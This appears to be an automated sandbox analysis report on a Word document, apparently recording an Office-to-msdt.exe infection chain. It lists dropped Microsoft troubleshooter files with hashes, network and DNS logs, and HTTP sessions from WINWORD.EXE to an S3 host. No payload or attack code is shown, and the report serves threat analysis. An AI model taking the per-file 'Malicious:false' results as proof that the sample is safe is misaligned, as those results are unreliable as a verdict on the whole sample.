                                                                                                                                                                  SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                  SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                   • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):50242
                                                                                                                                                                  Entropy (8bit):4.932919499511673
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                  MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                  SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                  SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                  SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16946
                                                                                                                                                                  Entropy (8bit):4.860026903688885
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                  MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                  SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                  SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                  SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):453
                                                                                                                                                                  Entropy (8bit):4.983419443697541
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                  MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                  SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                  SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                  SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6650
                                                                                                                                                                  Entropy (8bit):3.6751460885012333
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                  MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                  SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                  SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                  SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                  Entropy (8bit):3.517898352371806
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                  MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                  SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                  SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                  SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                   • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):48956
                                                                                                                                                                  Entropy (8bit):5.103589775370961
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                  MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                  SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                  SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                  SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                                                  File type:Microsoft Word 2007+
                                                                                                                                                                  Entropy (8bit):7.342099959599253
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                  • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                  • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                  File name:icRTA4gcSe.docx
                                                                                                                                                                  File size:11588
                                                                                                                                                                  MD5:9873ccaccab0237bf533324f69dff3b3
                                                                                                                                                                  SHA1:29d098d9ddf7e425413817089beb2eb14c91bc64
                                                                                                                                                                  SHA256:05625644a2e070d4780822daf7126f408ec0db9881a9995dc24ee500b624a198
                                                                                                                                                                  SHA512:882c74e579e8aa9cc9fff1eb29c9f01a7a8c85fbff836676f79eedf1fbd5eedce1872977935e68faa59dc3049095b40f19b06e43717bead435a0e22c070cc962
                                                                                                                                                                  SSDEEP:192:CtIWmk402hTZ3S7Ok0lyCpLpYBV7PuNrxnpApwzxux:aIWmkIhTZC789YBY9Vzxux
                                                                                                                                                                  TLSH:BB32BF37CE46E822C641C87871D942EFF32C4797A715CBDB414E52C6149738A23BEE29
                                                                                                                                                                  File Content Preview:PK..........!....lZ... .......[Content_Types].xml ...(.........................................................................................................................................................................................................
                                                                                                                                                                  Icon Hash:74fcd0d2d6d6d0cc
                                                                                                                                                                   Timestamp                             Source Port  Dest Port  Source IP      Dest IP
                                                                                                                                                                   Aug 18, 2022 02:01:55.171631098 CEST  49746        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.171685934 CEST  443          49746      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.171771049 CEST  49746        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.173043966 CEST  49746        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.173069000 CEST  443          49746      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.284960985 CEST  443          49746      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.285151958 CEST  49746        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.287527084 CEST  49746        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.287554979 CEST  443          49746      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.287811041 CEST  443          49746      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.289504051 CEST  49746        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.326055050 CEST  443          49746      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.330045938 CEST  443          49746      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.330157042 CEST  49746        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.334287882 CEST  49746        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.334317923 CEST  443          49746      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.391673088 CEST  49747        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.391730070 CEST  443          49747      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.391828060 CEST  49747        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.392059088 CEST  49747        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.392071009 CEST  443          49747      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.503655910 CEST  443          49747      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.505837917 CEST  49747        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.505868912 CEST  443          49747      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.507261038 CEST  49747        443        192.168.2.3    52.95.148.198
                                                                                                                                                                   Aug 18, 2022 02:01:55.507277966 CEST  443          49747      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.545725107 CEST  443          49747      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.545805931 CEST  443          49747      52.95.148.198  192.168.2.3
                                                                                                                                                                   Aug 18, 2022 02:01:55.545881987 CEST  49747        443        192.168.2.3    52.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.552083015 CEST49747443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.552114010 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:55.552128077 CEST49747443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:55.552134991 CEST4434974752.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.629345894 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.629399061 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.629481077 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.629786015 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.629798889 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.763305902 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.764017105 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.764045954 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.765404940 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.765419960 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.804188967 CEST4434974852.95.148.198192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.804595947 CEST49748443192.168.2.352.95.148.198
                                                                                                                                                                  Aug 18, 2022 02:01:58.908571005 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:58.908622026 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:58.908720016 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:58.909761906 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:58.909789085 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.026542902 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.026638031 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.036384106 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.036415100 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.036796093 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.036865950 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.037455082 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.079376936 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.114492893 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.114577055 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.114608049 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.114625931 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.114639997 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.114658117 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.114696026 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.117564917 CEST49749443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.117599010 CEST4434974952.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.294574022 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.294631004 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.294743061 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.295038939 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.295054913 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.406631947 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.406847000 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.407361984 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.407377958 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.410166025 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.410183907 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.448570013 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.448667049 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.448692083 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.448714972 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.448807955 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.448816061 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.449383974 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.449398041 CEST4434975052.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.449408054 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.449448109 CEST49750443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.623143911 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.623199940 CEST4434975152.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.623264074 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.623554945 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.623568058 CEST4434975152.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.727024078 CEST4434975152.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.727139950 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.738238096 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.738255024 CEST4434975152.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.740786076 CEST49751443192.168.2.352.95.143.42
                                                                                                                                                                  Aug 18, 2022 02:01:59.740802050 CEST4434975152.95.143.42192.168.2.3
                                                                                                                                                                  Aug 18, 2022 02:01:59.777492046 CEST4434975152.95.143.42192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 18, 2022 02:01:55.141829967 CEST | 52387 | 53 | 192.168.2.3 | 8.8.8.8
Aug 18, 2022 02:01:55.163202047 CEST | 53 | 52387 | 8.8.8.8 | 192.168.2.3
Aug 18, 2022 02:01:58.890090942 CEST | 60625 | 53 | 192.168.2.3 | 8.8.8.8
Aug 18, 2022 02:01:58.906965971 CEST | 53 | 60625 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 18, 2022 02:01:55.141829967 CEST | 192.168.2.3 | 8.8.8.8 | 0x2a30 | Standard query (0) | sqdocs.s3.eu-west-2.amazonaws.com | A (IP address) | IN (0x0001)
Aug 18, 2022 02:01:58.890090942 CEST | 192.168.2.3 | 8.8.8.8 | 0x22d7 | Standard query (0) | sqdocs.s3.eu-west-2.amazonaws.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 18, 2022 02:01:55.163202047 CEST | 8.8.8.8 | 192.168.2.3 | 0x2a30 | No error (0) | sqdocs.s3.eu-west-2.amazonaws.com | s3-r-w.eu-west-2.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Aug 18, 2022 02:01:55.163202047 CEST | 8.8.8.8 | 192.168.2.3 | 0x2a30 | No error (0) | s3-r-w.eu-west-2.amazonaws.com | - | 52.95.148.198 | A (IP address) | IN (0x0001)
Aug 18, 2022 02:01:58.906965971 CEST | 8.8.8.8 | 192.168.2.3 | 0x22d7 | No error (0) | sqdocs.s3.eu-west-2.amazonaws.com | s3-r-w.eu-west-2.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Aug 18, 2022 02:01:58.906965971 CEST | 8.8.8.8 | 192.168.2.3 | 0x22d7 | No error (0) | s3-r-w.eu-west-2.amazonaws.com | - | 52.95.143.42 | A (IP address) | IN (0x0001)
• sqdocs.s3.eu-west-2.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49746 | 52.95.148.198 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 00:01:55 UTC | 0 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: sqdocs.s3.eu-west-2.amazonaws.com
2022-08-18 00:01:55 UTC | 0 | IN | HTTP/1.1 400 Bad Request
x-amz-request-id: 5QCKAXC7DG7KWCEQ
x-amz-id-2: ZmvR6seVEacXD3bHCJcCVNc24scqdKcionnSYgtdPuKR55sTeEnQFN39kbcGKOSJtT8Px8zchS0=
Content-Type: application/xml
Transfer-Encoding: chunked
Date: Thu, 18 Aug 2022 00:01:54 GMT
Server: AmazonS3
Connection: close
2022-08-18 00:01:55 UTC | 0 | IN | Data Raw: 31 31 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 35 51 43 4b 41 58 43 37 44 47 37 4b 57 43 45 51 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 5a 6d 76 52 36 73 65 56 45 61 63 58 44 33 62 48 43 4a 63 43 56 4e 63 32 34 73 63 71 64 4b 63 69 6f 6e 6e 53 59 67 74 64 50 75 4b 52 35 35 73 54 65 45 6e 51 46 4e 33 39 6b 62 63 47
Data Ascii: 11b<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>5QCKAXC7DG7KWCEQ</RequestId><HostId>ZmvR6seVEacXD3bHCJcCVNc24scqdKcionnSYgtdPuKR55sTeEnQFN39kbcG
2022-08-18 00:01:55 UTC | 0 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49747 | 52.95.148.198 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
